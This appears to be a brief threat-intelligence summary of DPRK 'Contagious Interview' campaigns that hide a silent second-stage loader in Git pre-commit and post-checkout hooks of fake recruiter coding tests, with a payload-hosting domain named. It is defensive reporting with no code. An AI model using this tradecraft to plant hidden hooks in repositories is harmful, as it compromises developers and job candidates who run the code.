OpenSourceMalware reports that DPRK Contagious Interview and TaskJacker operators are hiding a second-stage loader inside Git pre-commit hooks instead of prior locations such as VS Code tasks, package postinstall scripts, or fake font files. The hook fingerprints the operating system with uname and retrieves platform-specific payloads from precommit.vercel.app paths for macOS, Linux, and Windows-like Git environments. The technique fits fake recruiter coding-assessment lures because hooks can run when a candidate tries to commit code, while output is suppressed and the commit is allowed to continue. Observed repositories followed the Contagious Interview pattern, including crypto or DeFi themes, fresh GitHub accounts, minimal history, and tasks requiring local execution, with post-checkout hooks also noted.